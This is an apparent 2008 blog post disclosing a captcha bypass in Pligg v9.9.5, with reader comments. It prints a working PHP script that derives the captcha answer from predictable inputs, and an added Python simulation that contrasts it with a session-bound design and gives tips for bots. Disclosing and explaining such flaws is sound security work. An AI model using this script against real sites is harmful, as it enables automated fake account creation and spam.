Pligg v9.9.5 New Captcha Bypass Security Exploit Found

After the hurried and somewhat controversial release of Pligg v9.9.5, which fixed some serious security holes, it has come to light today that a new exploit has been found in v9.9.5 itself: a captcha bypass caused by an implementation issue. The impact is that an attacker can create Pligg user accounts automatically.

Software Affected: Pligg v9.9.5

The latest version of Pligg suffers from a captcha bypass due to an implementation issue. The impact is that an attacker can automatically create user accounts for Pligg. The ability to create new user accounts makes this auto-voter exploit more serious: http://www.rooksecurity.com/blog/?p=19

The captcha's answer is generated the same way as in PHP-Nuke 8.1, which was broken here:

http://www.securityfocus.com/bid/27129/info

This is a more serious attack when combined with my captcha bypass, which allows an attacker to create new user accounts.

Again the captcha is produced using md5; however, the inputs are different here. $_SERVER['HTTP_USER_AGENT'] and $ts_random can be controlled by the attacker, $sitekey is a static value, and $datekey is known because it is based on the current date.

Exploit:

The link to the captcha image will look something like this:

http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854

To obtain the clear-text answer, send that ts_random value to captcha_bypass.php from the same web browser (the User-Agent has to match, since it is part of the hash):

http://127.0.0.1/captcha_bypass.php?ts_random=54771854

captcha_bypass.php:

<?php
// Static site key of the targeted Pligg install
$sitekey=82397834;
// The ts_random value taken from the ts_image.php URL
$ts_random=$_REQUEST['ts_random'];
// date("F j") gives e.g. "August 2"; the server computes the same value
$datekey = date("F j");
// Same derivation as ts_image.php; the User-Agent must be the one that will submit the form
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
print substr($rcode, 2, 6);
?>
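To make the weakness concrete, here is an added example (not code from Pligg or from the Rook Security advisory) that simulates the captcha derivation described above on both sides: a server that recomputes the answer from the User-Agent, static site key, ts_random and date, and an attacker who does the same computation and passes registration without ever looking at the image. It is then contrasted with a session-bound captcha whose answer is random and stored server-side. Assumptions: the request-handling model (that the registration form re-derives the answer from the same request data) is a model, not Pligg's actual code; the PHP float-to-string behaviour of hexdec() on an md5 digest is approximated with 14 significant digits; the date 2008-08-02 and the User-Agent string are made-up inputs.

```python
# Added example, not code from the Pligg project or the Rook Security advisory.
# Models the captcha derivation described in the post on both the server and
# the attacker side, then contrasts it with a session-bound random captcha.
import hashlib
import hmac
import secrets
from datetime import date

SITEKEY = "82397834"  # static value taken from the captcha_bypass.php script above


def php_float_to_string(value: int) -> str:
    """Approximate PHP's hexdec() on a 32-digit md5 hex string.

    The value exceeds PHP_INT_MAX, so hexdec() returns a float and string
    conversion renders it with 14 significant digits, e.g. '2.8764320123456E+38'.
    This is an assumed approximation of PHP's formatting; substr($rcode, 2, 6)
    then takes the six characters after the decimal point.
    """
    return "%.14G" % float(value)


def php_datekey(day: date) -> str:
    """PHP date('F j'): full month name and day of month without leading zero."""
    return "%s %d" % (day.strftime("%B"), day.day)


def pligg_captcha_code(user_agent: str, ts_random: str, datekey: str,
                       sitekey: str = SITEKEY) -> str:
    """The derivation the post describes: none of the inputs is secret from the client."""
    digest = hashlib.md5((user_agent + sitekey + ts_random + datekey).encode()).hexdigest()
    return php_float_to_string(int(digest, 16))[2:8]


class VulnerableServer:
    """Assumed model of the weak design: the expected answer is recomputed from
    request data, so no per-session secret exists and anyone who controls the
    User-Agent and ts_random can reproduce it."""

    def __init__(self, today: date):
        self.today = today

    def expected_answer(self, user_agent: str, ts_random: str) -> str:
        return pligg_captcha_code(user_agent, ts_random, php_datekey(self.today))

    def register(self, user_agent: str, ts_random: str, answer: str) -> bool:
        return hmac.compare_digest(self.expected_answer(user_agent, ts_random), answer)


def attacker_solve(user_agent: str, ts_random: str, today: date,
                   sitekey: str = SITEKEY) -> str:
    """What captcha_bypass.php does: rebuild the answer without the image."""
    return pligg_captcha_code(user_agent, ts_random, php_datekey(today), sitekey)


class HardenedServer:
    """Answer is random, stored against the session and consumed on first use,
    so nothing in the request lets the client derive it."""

    def __init__(self):
        self.sessions = {}

    def new_captcha(self, session_id: str) -> str:
        answer = "%06d" % secrets.randbelow(10 ** 6)
        self.sessions[session_id] = answer
        return answer  # a real application renders this into the image only

    def register(self, session_id: str, answer: str) -> bool:
        expected = self.sessions.pop(session_id, None)  # single use
        return expected is not None and hmac.compare_digest(expected, answer)


def demo() -> dict:
    day = date(2008, 8, 2)  # constructed: the post's publication date as the datekey
    ua, ts_random = "Mozilla/5.0 (bot)", "54771854"  # ts_random from the post's URL
    server = VulnerableServer(day)
    forged = attacker_solve(ua, ts_random, day)
    bypassed = server.register(ua, ts_random, forged)  # True: attacker never saw the image

    hardened = HardenedServer()
    hardened.new_captcha("sess1")
    guessed = hardened.register("sess1", forged)  # False: request data reveals nothing
    return {"datekey": php_datekey(day), "forged": forged,
            "bypassed": bypassed, "guessed": guessed}


if __name__ == "__main__":
    print(demo())
```

Two practical caveats follow from the model: the attacker's datekey is the server's local date, so a bot should retry with the adjacent day around midnight, and the bypass only works if the User-Agent that fetched ts_random is the one that submits the form, which is why the advisory says to use the same browser.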

Thanks to the Rook Security blog for the tip-off.


Article Details

Published: August 2nd, 2008

Category: Pligg

  1. Kris says:

    Is this exploit present in YADC too?

  2. D Cotton says:

    I’m closing down new registrations until all this is sorted out.

  3. bbrian017 says:

    OMG, I hate this crap. These people should change careers and stop hacking....

    Please can you get a reply notification mod?

  4. Klanjabrik says:

    Hi guys,

    I plan to use Pligg, but I'm worried about "query-sucker" problems like WordPress has. Is Pligg lighter than WordPress? Thanks in advance.
